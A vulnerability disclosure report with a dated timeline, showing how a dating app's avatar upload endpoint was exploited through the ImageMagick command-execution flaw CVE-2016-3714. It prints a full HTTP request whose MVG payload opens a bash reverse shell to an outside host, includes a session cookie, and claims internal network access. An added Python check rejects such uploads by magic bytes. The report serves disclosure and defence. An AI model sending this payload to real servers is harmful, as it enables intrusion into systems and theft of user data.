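2016-06-03: Details reported to the vendor; awaiting vendor response
2016-06-04: Vendor confirmed; details disclosed to the vendor only
2016-06-14: Details disclosed to core white hats and experts in the relevant field
2016-06-24: Details disclosed to regular white hats
2016-07-04: Details disclosed to trainee white hats
2016-07-19: Details disclosed to the public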
Target: the Baihe Miyu (百合密语) iOS app. Testing found that the avatar upload is affected by CVE-2016-3714 - ImageMagick command execution.
POST http://miyu.apps.ibaihe.com/user/update HTTP/1.1
Host: miyu.apps.ibaihe.com
Content-Type: multipart/form-data; boundary=Boundary+21678AD4911AD07A
Cookie: SESSIONID=8A599FECF109036CF707D19BCF8F0A8A7E3809B8C2B84839E3C1AC204E3F0640EAAF21A8534AB4048BBDA6AF5A7D2456A41ACE153F7D435B7D1A9A01C1FDD016CECC60F99738981F657CA808FA71C17F6A8E20E1D5D2ED2CDFBAC1DE748EDF54
Connection: keep-alive
Connection: keep-alive
Accept: */*
User-Agent: BHMY/1.4.6 (iPhone; iOS 9.3.2; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 841
Accept-Encoding: gzip, deflate

--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="channel"

iOS||iOS_9.3.2||AppSotre||iPhone 6s||Apple
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="listener"

0
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="version"

1.4.6
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"; filename="2016-06-03-20-49-04-0.jpg"
Content-Type: jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A--
Reverse shell
Pinging the main Baihe site showed that I was already inside the internal network.
Advice welcome~
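A server-side check that would reject the upload shown above before it reaches ImageMagick, as an added example that is not part of the original report: a file is accepted only when its leading magic bytes identify an allowed raster format that also matches its extension. The function names, the allowed-format list and the sample bytes are assumptions constructed for illustration.

```python
import os

# Magic-byte prefixes for the only formats this hypothetical avatar endpoint accepts.
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}


def sniff_format(data: bytes):
    """Return the format named by the leading magic bytes, or None."""
    for fmt, prefixes in SIGNATURES.items():
        if data.startswith(prefixes):
            return fmt
    return None


def check_avatar(filename: str, data: bytes):
    """Decide whether an upload may be handed to the image processor.

    Returns (accepted, detail). On acceptance, detail is the sniffed format,
    which the caller can pass as an explicit coder prefix ("jpeg:<path>")
    so the processor does not choose a coder from the content itself.
    """
    claimed = EXTENSIONS.get(os.path.splitext(filename)[1].lower())
    if claimed is None:
        return False, "extension not allowed"
    actual = sniff_format(data)
    if actual is None:
        return False, "content is not a supported raster image"
    if actual != claimed:
        return False, f"extension says {claimed}, content is {actual}"
    return True, actual


# Constructed samples (not taken from the report's traffic).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
# MVG text with the same shape as the uploaded "jpg", command payload omitted.
MVG_SAMPLE = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"fill 'url(https://example.com/image.jpg)'\npop graphic-context\n")

if __name__ == "__main__":
    for name, body in [("a.jpg", JPEG_SAMPLE), ("a.jpg", PNG_SAMPLE),
                       ("2016-06-03-20-49-04-0.jpg", MVG_SAMPLE)]:
        print(name, check_avatar(name, body))
```

Magic-byte checking complements, and does not replace, patching ImageMagick and disabling the MVG, MSL, EPHEMERAL, URL and HTTPS coders in its policy.xml.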
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2016-06-04 11:58
How come there is another vulnerability
None yet